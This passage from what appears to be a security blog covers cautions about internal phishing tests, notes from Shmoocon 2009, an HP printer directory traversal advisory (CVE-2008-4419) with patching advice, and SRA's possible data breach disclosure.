Any such testing should have the appropriate approval, of course, and the contents of the phish should be considered carefully. You don’t want users to think you’ve gathered their credit card information, and you don’t want them notifying external fraud alert services. There are plenty of educational opportunities without attempting to harvest PayPal accounts, for example.

Shmoocon 2009

I’m at Shmoocon 5 this weekend. It’s my third time down there (I missed 1 and 3). Always a good time.
This year’s event has 1500 attendees, 40% larger than last year. 30ish talks chosen from 100 submitted.
The opening remarks kind of paralleled what I’ve been thinking lately. The stakes are high. Yet any sort of targeted attack has a great chance of succeeding. Many of our defenses are the same layer repeated. “We’ve built a Maginot line…in depth.”

HP Printer HTTP Authentication Bypass

HP is reporting that “a potential security vulnerability has been identified with certain HP LaserJet printers, HP Color LaserJet printers and HP Digital Senders. The vulnerability could be exploited remotely to gain unauthorized access to files.”
CVE-2008-4419 adds that this is a directory traversal vulnerability.
In a post to Bugtraq, Digital Defense says an attacker can read arbitrary system configuration files, and cached documents.
HP Web Jetadmin should make quick work of pushing the updates for printer admins.

SRA Reports Possible Data Breach

SRA warned employees, ex-employees and customers of a possible data breach.
In a letter to the Maryland Attorney General’s office, SRA reported that a virus on their network may have led to data disclosure.